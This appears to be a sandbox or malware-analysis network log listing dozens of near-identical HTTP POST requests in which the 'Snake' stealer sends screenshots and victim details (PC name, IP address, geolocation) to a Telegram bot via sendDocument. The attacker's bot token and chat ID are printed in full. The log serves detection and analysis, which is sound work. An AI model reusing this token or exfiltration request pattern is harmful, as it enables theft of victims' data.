                  Source: global trafficHTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:25%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd527858d8e06dHost: api.telegram.orgContent-Length: 708871
                  Source: global trafficHTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:21%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd52b54d4321b1Host: api.telegram.orgContent-Length: 708871Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:25%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd52926ced3f6fHost: api.telegram.orgContent-Length: 708871Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:21%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd52e126516bcaHost: api.telegram.orgContent-Length: 708871
                  Source: global trafficHTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:25%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd52ab19b3a220Host: api.telegram.orgContent-Length: 709019Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:21%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd52f5b3c3d196Host: api.telegram.orgContent-Length: 709019Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:25%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd52baa27237deHost: api.telegram.orgContent-Length: 708871Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:21%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd531094a8e31dHost: api.telegram.orgContent-Length: 708871Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:25%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd52d32761eedeHost: api.telegram.orgContent-Length: 708871Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:21%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd532a1929ec59Host: api.telegram.orgContent-Length: 708871Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:25%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd52ee25ccbe96Host: api.telegram.orgContent-Length: 709301Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:21%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd534b2a82ce6fHost: api.telegram.orgContent-Length: 709035Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:25%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd53067cb44c72Host: api.telegram.orgContent-Length: 708871Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:21%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd536ad406e147Host: api.telegram.orgContent-Length: 708871Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:25%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd5323d71b77e3Host: api.telegram.orgContent-Length: 708871Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:21%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd5389207e2af1Host: api.telegram.orgContent-Length: 708871Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:25%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd53425b214fa7Host: api.telegram.orgContent-Length: 708871Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:21%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd53b025be574fHost: api.telegram.orgContent-Length: 708871Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:25%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd5365d6eb9d0eHost: api.telegram.orgContent-Length: 708871Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:21%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd53d84a6f0a7bHost: api.telegram.orgContent-Length: 708871Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:21%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd53ff101227c7Host: api.telegram.orgContent-Length: 708871Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:25%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd5386acd74a6bHost: api.telegram.orgContent-Length: 708871Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:21%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd543714563e9dHost: api.telegram.orgContent-Length: 708871Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:25%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd53b66f190127Host: api.telegram.orgContent-Length: 708871Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:21%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd5464fb1a232bHost: api.telegram.orgContent-Length: 709261Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:25%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd53dabd910181Host: api.telegram.orgContent-Length: 709261Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:21%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd54a2cf5faa4eHost: api.telegram.orgContent-Length: 701171Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:25%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd54016fcc0347Host: api.telegram.orgContent-Length: 708871Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:21%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd54e05f5db70bHost: api.telegram.orgContent-Length: 709502Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:25%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd5436e26a3730Host: api.telegram.orgContent-Length: 708871Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:21%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd5508dcd0ab34Host: api.telegram.orgContent-Length: 706776Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:25%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd548fed14e72aHost: api.telegram.orgContent-Length: 708871Connection: Keep-Alive
